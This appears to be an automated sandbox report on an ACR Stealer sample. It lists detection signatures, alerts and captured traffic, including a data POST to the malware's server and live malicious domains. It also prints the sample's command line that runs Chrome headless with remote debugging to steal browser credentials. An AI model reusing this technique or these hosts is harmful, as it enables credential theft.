Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:	Setup.exe
Analysis ID:	1581482
MD5:	f18fa7132a5eda29041fdd8ae85363db
SHA1:	4de6de8445b5dc6897461b684da74df7e9673f78
SHA256:	543c81da09d6669ddf5fbb2d6c3889d7dabfd166d3f726349c30a51c542a2f50
Tags:	exeuser-aachum
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

AI detected suspicious sample

Found many strings related to Crypto-Wallets (likely being stolen)

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Sigma detected: Browser Execution In Headless Mode

Sigma detected: Browser Started with Remote Debugging

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Setup.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: F18FA7132A5EDA29041FDD8AE85363DB)

chrome.exe (PID: 3752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,16733493864301612391,3478327303608930267,262144 --disable-features=PaintHolding /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

WerFault.exe (PID: 7460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 2328 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 2324 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xa0111:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1878083732.0000000003C40000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2277405706.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Setup.exe PID: 6900	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: Setup.exe PID: 6900	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Setup.exe.2d523e4.0.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x9dd2d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0.2.Setup.exe.2d523e4.0.raw.unpack	infostealer_win_acrstealer_str	Finds ACR Stealer standalone samples based on specific strings.	Sekoia.io	0x86030:$str01: ref.txt 0x86aac:$str02: Wininet.dll 0x86b28:$str03: Content-Type: application/octet-stream; boundary=---- 0x86b70:$str04: POST 0x85a88:$str05: os_c 0x85a90:$str06: en_k 0x86090:$str07: MyApp/1.0 0x85e00:$str08: /Up/b 0x86598:$str10: /ujs/ 0x867dc:$str11: /Up/ 0x865cc:$str12: ostr 0x865f8:$str12: ostr 0x86624:$str12: ostr 0x8663c:$str12: ostr 0x865d4:$str13: brCH 0x86604:$str13: brCH 0x865e4:$str14: brGk 0x859f0:$str15: https://steamcommunity.com/profiles/ 0x85f08:$str15: https://steamcommunity.com/profiles/ 0x85f70:$str15: https://steamcommunity.com/profiles/ 0x86488:$str15: https://steamcommunity.com/profiles/
0.2.Setup.exe.2d523e4.0.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x9ab2d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0.2.Setup.exe.2d523e4.0.unpack	infostealer_win_acrstealer_str	Finds ACR Stealer standalone samples based on specific strings.	Sekoia.io	0x85430:$str01: ref.txt 0x85eac:$str02: Wininet.dll 0x85f28:$str03: Content-Type: application/octet-stream; boundary=---- 0x85f70:$str04: POST 0x84e88:$str05: os_c 0x84e90:$str06: en_k 0x85490:$str07: MyApp/1.0 0x85200:$str08: /Up/b 0x85998:$str10: /ujs/ 0x85bdc:$str11: /Up/ 0x859cc:$str12: ostr 0x859f8:$str12: ostr 0x85a24:$str12: ostr 0x85a3c:$str12: ostr 0x859d4:$str13: brCH 0x85a04:$str13: brCH 0x859e4:$str14: brGk 0x84df0:$str15: https://steamcommunity.com/profiles/ 0x85308:$str15: https://steamcommunity.com/profiles/ 0x85370:$str15: https://steamcommunity.com/profiles/ 0x85888:$str15: https://steamcommunity.com/profiles/

Sigma Signatures

System Summary

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6900, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", ProcessId: 3752, ProcessName: chrome.exe

Sigma detected: Browser Execution In Headless Mode

Source: Process started

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6900, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default", ProcessId: 3752, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE ACR Stealer CnC Checkin Attempt

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T21:20:21.370450+0100	2052674	1	A Network Trojan was detected	192.168.2.4	49732	104.21.2.114	443	TCP

ET MALWARE ACR Stealer Data Exfiltration Attempt M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T21:20:23.609794+0100	2052675	1	A Network Trojan was detected	192.168.2.4	49734	104.21.2.114	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T21:20:18.977823+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49730	23.55.153.106	443	TCP
2024-12-27T21:20:21.370450+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49732	104.21.2.114	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txtL	Avira URL Cloud: Label: malware
Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txt	Avira URL Cloud: Label: malware

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_031ABA40 lstrlen,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,CryptUnprotectData,

0_2_031ABA40

Source: Setup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.114:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031B2080 FindFirstFileA,FindNextFileA,Sleep,		0_2_031B2080
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031ADED0 FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,		0_2_031ADED0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.4:49732 -> 104.21.2.114:443
Source: Network traffic	Suricata IDS: 2052675 - Severity 1 - ET MALWARE ACR Stealer Data Exfiltration Attempt M1 : 192.168.2.4:49734 -> 104.21.2.114:443

Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49732 -> 104.21.2.114:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49730 -> 23.55.153.106:443

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.101
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.101
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_031CDEB0 InternetOpenUrlA,InternetReadFile,InternetReadFile,

0_2_031CDEB0

Source: global traffic	HTTP traffic detected: GET /profiles/76561199680660089 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3Host: steamcommunity.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3Host: ras2.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chrome.exe, 00000002.00000002.2943690870.0000620400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000002.00000002.2943690870.0000620400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.html@ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000002.00000002.2941934704.0000620400709000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000002.00000002.2941934704.0000620400709000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;e equals www.youtube.com (Youtube)
Source: chrome.exe, 00000002.00000003.1916215066.0000620400FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1915465628.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916251328.0000620400F94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000002.00000003.1916215066.0000620400FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1915465628.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916251328.0000620400F94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000002.00000002.2941934704.0000620400709000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000002.00000002.2941934704.0000620400709000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000002.00000002.2939659737.00006204002E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000002.00000002.2946661475.00006204012C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: ras2.shop
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com

Source: unknown

HTTP traffic detected: POST /Up HTTP/1.1Content-Type: application/octet-stream; boundary=----User-Agent: MyApp/1.0Host: ras2.shopContent-Length: 349Cache-Control: no-cache

Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
